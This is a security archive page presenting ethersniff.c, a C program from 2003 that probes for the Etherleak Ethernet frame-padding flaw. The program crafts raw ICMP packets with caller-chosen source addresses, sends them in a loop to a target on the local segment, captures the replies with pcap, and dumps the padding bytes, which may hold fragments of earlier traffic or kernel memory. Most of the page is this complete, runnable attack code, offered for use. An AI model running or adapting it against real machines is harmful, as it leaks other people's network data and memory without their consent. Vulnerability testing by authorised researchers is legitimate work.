exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ethersniff.c

ethersniff.c
Posted May 23, 2003
Authored by Michael Komm

A simple utility to probe for the etherleak vulnerability discussed in the Atstake paper where multiple platforms have ethernet Network Interface Card (NIC) device drivers that incorrectly handle frame padding, allowing an attacker to view slices of previously transmitted packets or portions of kernel memory due to poor programming practices.

tags | tool, kernel, sniffer
SHA-256 | 9b38eed6a90cbaeff291ef0210cff9d02cc4611556b55e9c0a6a03af70b6e037

ethersniff.c

Change Mirror Download
/***************************************************************************
ethersniff.c - Etherleak probing tool
-------------------
begin : St kvì 7 2003
copyright : (C) 2003 by Michael Komm
email : michael.komm@centrum.cz
***************************************************************************/

/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
/*
The target machine has to be on the same network segment to receive
ethernet frames (and you have to be r00t)!

Full info on the Ethernet frame padding information leakage
www.atstake.com/research/advisories/ 2003/atstake_etherleak_report.pdf

sorry for the nasty coding, I'm a C newbie :>

Some code ripped from ICMPSpewf v1 by Max0r
and ishell by Peter Kieltyka (elux)
- Thanx guys :)

*/
//to compile: gcc -lpcap -lpthread -o ethersniff ethersniff.c

#include <stdio.h>
#include <netinet/ip.h>
#include <arpa/inet.h>
#include <netinet/ip_icmp.h>
#include <stdlib.h>
#include <sys/types.h>
#include <asm/types.h>
#include <sys/select.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <fcntl.h>
#include <netdb.h>
#include <pcap.h>
#include <pthread.h>
#include <string.h>
#include <unistd.h>



#define SEQ 20985
#define MAX_DATA 100

//some globals

int delay,type,data_len;
unsigned char dump_file[50];
unsigned char data[MAX_DATA];
unsigned int source,target;
int verbose, mode;
//mode - 0 is normal, 1 is just send and -1 is just listen
struct sockaddr_in sin_addr;
struct hostent *he;
char *dest;
unsigned char errbuf[65400];
unsigned char user[65400];
pcap_t *dev;
pthread_t listener;
FILE *dump;
/*IP header struct */
struct ip_hdr {
u_int ip_hl:4,
ip_v: 4;
u_char ip_tos;
u_short ip_len;
u_short ip_id;
u_short ip_off;
u_char ip_ttl;
u_char ip_p;
u_short ip_sum;
u_long saddr, daddr;
} ip_head;
/*ICMP header struct */
struct icmp_hdr {
u_char type;
u_char code;
u_long checksum;

} icmp_head;

void print_logo () {
printf("\033[33m");
printf(" _____ _______ _ _ ____ ___ ___ _ _ ___ ____ ____ \n");
printf(" | __| |__ __| | | | | | __| | \\ / __/ | \\ | | | | | __| | __|\n");
printf(" | |_ | | | |_| | | |_ | |) ) ( |__ | \\\\ | | | | | |_ | |_ \n");
printf(" | _| | | | _ | | _| | / \\__ \\ | |\\\\| | | | | _| | _| \n");
printf(" | |__ | | | | | | | |__ | |\\ \\ __/ )| | \\\\ | | | | | | | \n");
printf(" |____| |_| |_| |_| |____| |_| \\_\\ |___/ |_| \\_| |___| |_| |_| \033[0m\n");



}

/*---------------IP Checksum Calculation Routine----------------- */

unsigned short in_cksum(unsigned short *addr, int len)
{
register int nleft = len;
register unsigned short *w = addr;
register int sum = 0;
unsigned short answer = 0;

while (nleft > 1)
{
sum += *w++;
nleft -= 2;
}
if (nleft == 1)
{
*(u_char *)(&answer) = *(u_char *)w;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}

void usage(char *s) {
fprintf(stderr,"\nEthersniff - Etherleak probing tool \n");
fprintf(stderr,"\nCoded by Michael Komm (Robin) \n");
fprintf(stderr,"usage: %s [-t type] [-d delay] [-vhsl] [-f file] <source> <destination>\n", s);
fprintf(stderr," -t ICMP type of our packets (default 0)\n");
fprintf(stderr," -d delay between shots (default 1s)\n");
fprintf(stderr," -f dump file (default ethernsniff.dump)\n");
fprintf(stderr," -v verbose mode\n");
fprintf(stderr," -s just send packets\n");
fprintf(stderr," -l just listen for them\n");
fprintf(stderr," -h display this message\n");
exit(0);
}



/* ----------------end ripped checksum code------------*/

/*
Does what it saids - sends an ICMP packet of given type through a raw socket sfd
with specified source and destination address with payload in buffer
returns the sendto value
*/
int send_packet(int sfd, unsigned int src,unsigned int dst,
unsigned long seq,unsigned char *buffer, int len, int type)
{
struct sockaddr_in target;
char packet[2048];
int i;

/* Filling the IP Header */

ip_head.ip_hl = 5;
ip_head.ip_v = 4;
ip_head.ip_tos = 0;
ip_head.ip_len = sizeof(struct iphdr)+sizeof(struct icmphdr)+len*sizeof(unsigned char);
ip_head.ip_id = htonl(31337 + (rand()%100));
ip_head.ip_off = 0;
ip_head.ip_ttl = 255;
ip_head.ip_p = IPPROTO_ICMP;
ip_head.saddr = src;
ip_head.daddr = dst;
ip_head.ip_sum = 0;
ip_head.ip_sum = in_cksum((unsigned short *)&ip_head, sizeof(struct iphdr));

/* Filling the ICMP HEADER */
icmp_head.type = type;
icmp_head.code = 0;
icmp_head.checksum =0;
icmp_head.checksum = in_cksum((unsigned short *)&icmp_head, sizeof(struct icmphdr));

/* PACKET ASSEMBLY */

//first come the IP header
memcpy(packet,(char *)&ip_head, sizeof(ip_head));
//followed by the ICMP header
memcpy(packet+sizeof(ip_head), (char *)&icmp_head, sizeof(icmp_head));
//and the payload
memcpy(packet+sizeof(ip_head)+sizeof(icmp_head), buffer, len);


/* let's send it out */

target.sin_family = AF_INET;
target.sin_addr.s_addr = ip_head.daddr;

i = sendto(sfd, packet, sizeof(struct iphdr)+sizeof(struct icmphdr)+len,
0,(struct sockaddr *)&target, sizeof(struct sockaddr_in));
if (i < 0) {
perror("sendto()");
}
return(i);

}

/* End-point for the pcap_loop
Checks the packet, if it has proper length it prints the payload
and logs it in a file

*/
void show_packet(unsigned char *user, struct pcap_pkthdr *ph, u_char *buf) {
int i;
unsigned char ethernet_hdr [16];
//we have to choose between our packets and the other stuff
//let's suppose our packets are ICMP packets from the dest address (according to RFC)
struct ip_hdr incoming_ip;
struct icmp_hdr incoming_icmp;
memcpy((char *)&incoming_ip,buf+sizeof(ethernet_hdr), sizeof(incoming_ip));
//followed by the ICMP header
memcpy((char *)&incoming_icmp,buf+sizeof(incoming_ip)+sizeof(ethernet_hdr), sizeof(incoming_icmp));
//check for the right packet
if ((incoming_ip.saddr == target) && (incoming_ip.ip_p == IPPROTO_ICMP)) {
if (verbose == 1) {
printf("Packet matched (%d): ",ph->len);
}
//open the dump file
if ((dump = fopen(dump_file,"a+")) == NULL) {
printf("[-] Cannot open dump file!\n");

}
for (i=0;i< 28;i++) {
//the dump file will store the whole packet
fprintf(dump,"%c",buf[i]);
}
for (i=28;i< ph->len;i++) {
if ((buf[i] > 33)&&(buf[i] < 126)) {
printf("%c",buf[i]);
} else {
printf(".");
}
fprintf(dump,"%c",buf[i]);

}
printf("\n");
fprintf(dump,"\n");
fclose(dump);
}

}
void *listen_loop (void *data) {
int n;
if ((dev = pcap_open_live(NULL,100000,0,1,errbuf)) == NULL) {
printf("[-] Cannot open pcap: %s\n",errbuf);
exit(1);
}
if (verbose== 1) {
printf("OK\n");
}
n = pcap_loop(dev,-1,show_packet,user);
printf("[-] %d Packets received, exiting\n",n);

}
void main(int argc, char **argv)
{
extern char *optarg;
extern int optind;
int i, opt,n, type;
print_logo();
if(argc < 3)
{
usage(argv[0]);

}
//defaults
type = 8;
delay = 1;
data[0] = 0x62;
data_len = 0;
sprintf(dump_file,"ethersniff.dump");
verbose = 0;
mode = 0;

while ((opt = getopt(argc, argv, "f:t:d:vsl")) != EOF)
{
switch(opt){
case 't':
type = atoi(optarg);
break;
case 'd':
delay = atoi(optarg);
break;
case 'v':
verbose = 1;
break;
case 's':
mode = 1;
break;
case 'l':
mode = -1;
break;
case 'f':
strcpy(dump_file,optarg);
break;
case 'h':
usage(argv[1]);
break;

default:
usage(argv[1]);

}
}


source = inet_addr(argv[argc -2]);
target = inet_addr(argv[argc - 1]);
dest = argv[argc -1];
if((he = gethostbyname(dest)) == NULL) {
fprintf(stderr, "[-] Cannot resolve %s!\n", dest);
exit(-1);
}

sin_addr.sin_family = AF_INET;
sin_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(sin_addr.sin_zero), 0, 8);
if (verbose == 1) {
printf("[+] Packets of type %d: %s -> %s will be sent\n",type,argv[argc -2],argv[argc -1]);
}
if((i = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
perror("[-] socket()");
exit(1);
}

{ /* lets do it the ugly way.. */
int one = 1;
const int *val = &one;
if (setsockopt (i, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0) {
printf ("[-] Cannot set HDRINCL!\n");
exit(1);
}
}
//opening the capture thread
if (mode < 1) {
if (verbose == 1) {
printf("[+] Starting Pcap loop...");
}
}
pthread_create(&listener,NULL,listen_loop,NULL);
if ((verbose == 1) && (mode > -1)) {
printf("[+] Starting ping loop, delay will be %d s\n",delay);
}

//main and etternal loop
while(1) {
if (mode > -1) {
if (verbose) {
printf("Fire...");
}
n = send_packet(i, source, target, SEQ,data,data_len, type);
if (n < 0) {
printf("target missed, something's wrong!!!\n");
} else {
if (verbose == 1) {
printf("OK\n");
}
}
}
sleep(delay);

}
//we shouldn't get here
close(i);
}
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close